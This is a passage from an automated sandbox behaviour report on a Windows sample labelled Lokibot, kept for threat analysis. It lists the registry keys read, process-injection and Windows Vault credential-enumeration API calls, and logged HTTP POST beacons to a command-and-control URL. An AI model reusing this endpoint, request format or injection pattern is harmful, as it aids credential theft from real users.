HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ChannelAccess HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ChannelAccess
Write Keys
Nothing to display
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX D448845E628773E4A9A809DA
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification kernel32.dll.QueryActCtxW kernel32.dll.GetVersionExW kernel32.dll.GetFullPathNameW ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA mscoree.dll.GetMetaDataInternalInterface mscoreei.dll.GetMetaDataInternalInterface mscorwks.dll.GetMetaDataInternalInterface mscorjit.dll.getJit kernel32.dll.GetUserDefaultUILanguage kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName kernel32.dll.lstrlen kernel32.dll.lstrlenW mscoree.dll.ND_RI4 mscoreei.dll.ND_RI4 kernel32.dll.VirtualProtect kernel32.dll.GlobalMemoryStatusEx kernel32.dll.GetEnvironmentVariableW kernel32.dll.SwitchToThread kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.DebugActiveProcess kernel32.dll.WaitForDebugEvent kernel32.dll.ContinueDebugEvent kernel32.dll.DeleteFileA advapi32.dll.SetKernelObjectSecurity advapi32.dll.GetKernelObjectSecurity ntdll.dll.NtSetInformationProcess ntdll.dll.NtProtectVirtualMemory kernel32.dll.VirtualAllocEx kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext ntdll.dll.NtUnmapViewOfSection kernel32.dll.ResumeThread kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.WriteProcessMemory kernel32.dll.ReadProcessMemory kernel32.dll.TerminateProcess kernel32.dll.CreateProcessW ole32.dll.CoUninitialize kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash cryptsp.dll.CryptReleaseContext vaultcli.dll.VaultEnumerateItems vaultcli.dll.VaultEnumerateVaults vaultcli.dll.VaultFree vaultcli.dll.VaultGetItem vaultcli.dll.VaultOpenVault vaultcli.dll.VaultCloseVault sechost.dll.LookupAccountSidLocalW netapi32.dll.NetUserGetInfo cryptsp.dll.CryptImportKey cryptsp.dll.CryptSetKeyParam cryptsp.dll.CryptDecrypt cryptsp.dll.CryptDestroyKey ole32.dll.CoInitializeSecurity sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW ole32.dll.CoCreateInstance kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle fntcache.dll.ServiceMain fntcache.dll.SvchostPushServiceGlobals ntmarta.dll.GetMartaExtensionInterface uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware dwmapi.dll.DwmIsCompositionEnabled rpcrt4.dll.UuidFromStringW radarrs.dll.WdiDiagnosticModuleMain radarrs.dll.WdiHandleInstance radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion wkscli.dll.NetGetJoinInformation netutils.dll.NetApiBufferFree
Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\98765123.exe" C:\Windows\system32\lsass.exe C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
Started Services
VaultSvc
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-09-09 19:38:39 | 2018-09-09 19:41:48 | 189 |
2 HTTP Request(s) detected
http://shaktiorkatimo.com/symboss/fre.php
- Hostname: shaktiorkatimo.com
- IP Address:
- Port: 80
- Count: 2
POST /symboss/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: shaktiorkatimo.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 52C89A22 Content-Length: 192 Connection: close
http://shaktiorkatimo.com/symboss/fre.php
- Hostname: shaktiorkatimo.com
- IP Address:
- Port: 80
- Count: 11
POST /symboss/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: shaktiorkatimo.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 52C89A22 Content-Length: 165 Connection: close
Detected family: #Lokibot
TheSystem Itself @ 2018-09-09 20:00:03
#infosec #automation
TheSystem Itself @ 2018-09-09 19:45:18